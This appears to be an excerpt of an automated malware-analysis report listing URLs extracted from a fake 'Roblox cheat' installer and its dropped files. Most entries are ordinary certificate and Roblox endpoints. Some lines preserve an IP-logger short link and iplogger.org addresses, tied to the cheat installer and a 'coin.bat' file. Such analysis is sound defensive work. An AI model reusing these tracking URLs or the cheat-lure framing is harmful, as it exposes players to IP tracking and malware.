            Source: robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447390699.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447677703.0000000003F7F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003F92000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448098395.0000000003F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001BE4000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448009865.0000000001BF1000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1453591906.0000000001C18000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447490712.0000000001C15000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001BEF000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446970284.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447534893.0000000001C1B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448775676.0000000001C1D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447470573.0000000001C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
            Source: robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447390699.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447677703.0000000003F7F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003F92000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448098395.0000000003F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447552442.0000000001C26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447470573.0000000001C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447552442.0000000001C26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447973577.0000000001C2E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1453858015.0000000001C2F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448193902.0000000001C2F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447552442.0000000001C26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: robloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446970284.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447534893.0000000001C1B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448775676.0000000001C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: robloxPX1instaler.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447120080.0000000001C35000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
            Source: robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: robloxPX1instaler.exe, 00000002.00000002.1453826248.0000000001C28000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446970284.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447973577.0000000001C2E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447534893.0000000001C1B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1453858015.0000000001C2F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448193902.0000000001C2F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447552442.0000000001C26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448775676.0000000001C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://tools.medialab.sciences-po.fr/iwanthue/index.php
            Source: robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447120080.0000000001C35000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447470573.0000000001C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
            Source: robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
            Source: robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447951731.0000000003F87000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447390699.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447677703.0000000003F7F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454321758.0000000003F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445368599.0000000003FB3000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446558713.0000000003FB8000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449747424.0000000003FB9000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446944435.0000000003FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446970284.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447534893.0000000001C1B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446970284.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447534893.0000000001C1B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: robloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com
            Source: robloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/
            Source: robloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/om
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.11rbr
            Source: chromecache_64.20.drString found in binary or memory: https://2no.co/
            Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, coin.bat.3.drString found in binary or memory: https://2no.co/24RXx6
            Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/24RXx6H
            Source: chromecache_64.20.drString found in binary or memory: https://2no.co/redirect-2
            Source: chromecache_64.20.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
            Source: chromecache_64.20.drString found in binary or memory: https://cdn.iplogger.org/redirect/brand.png
            Source: chromecache_64.20.drString found in binary or memory: https://cdn.iplogger.org/redirect/handshake.png
            Source: chromecache_64.20.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png
            Source: robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmp, roblox cheat.exe, robloxPX1instaler_DD2F4.log.2.dr, robloxPX1instaler.exe.0.drString found in binary or memory: https://client-telemetry.roblox.com
            Source: robloxPX1instaler.exe, 00000002.00000003.1446077514.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446318793.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445368599.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449216456.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454531878.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.com9
            Source: robloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.comA
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHun
            Source: robloxPX1instaler.exe, 00000002.00000003.1446077514.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446318793.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445368599.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449216456.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454531878.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.come
            Source: robloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.cominatorey
            Source: robloxPX1instaler_DD2F4.log.2.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer
            Source: robloxPX1instaler.exe, 00000002.00000002.1454531878.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerLMEMH
            Source: robloxPX1instaler.exe, 00000002.00000003.1446077514.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446318793.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445368599.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449216456.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454531878.000000000400D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerons
            Source: robloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003FAB000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454406604.0000000003FAB000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446944435.0000000003FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerpany
            Source: robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448751210.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447771638.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454301246.0000000003F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64
            Source: robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448751210.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447771638.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454301246.0000000003F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64x
            Source: robloxPX1instaler_DD2F4.log.2.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper
            Source: robloxPX1instaler_DD2F4.log.2.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.
            Source: robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.h
            Source: robloxPX1instaler.exe, 00000002.00000003.1326917896.0000000004004000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperD
            Source: robloxPX1instaler.exe, 00000002.00000003.1326917896.0000000004004000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperate
            Source: robloxPX1instaler.exe, 00000002.00000003.1326917896.0000000004004000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)
            Source: chromecache_64.20.drString found in binary or memory: https://counter.yadro.ru/hit?
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://ecsv2.roblox.com/client/pbe
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS
            Source: robloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbeesInSec
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.drString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert
            Source: chromecache_64.20.drString found in binary or memory: https://iplogger.org/
            Source: chromecache_64.20.drString found in binary or memory: https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229
            Source: chromecache_64.20.drString found in binary or memory: https://iplogger.org/privacy/
            Source: chromecache_64.20.drString found in binary or memory: https://iplogger.org/rules/
            Source: robloxPX1instaler.exe.0.drString found in binary or memory: https://s3.amazonaws.com/
            Source: robloxPX1instaler.exe.0.drString found in binary or memory: https://setup.rbxcdn.com
            Source: robloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.comw
            Source: robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447390699.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447677703.0000000003F7F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454321758.0000000003F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
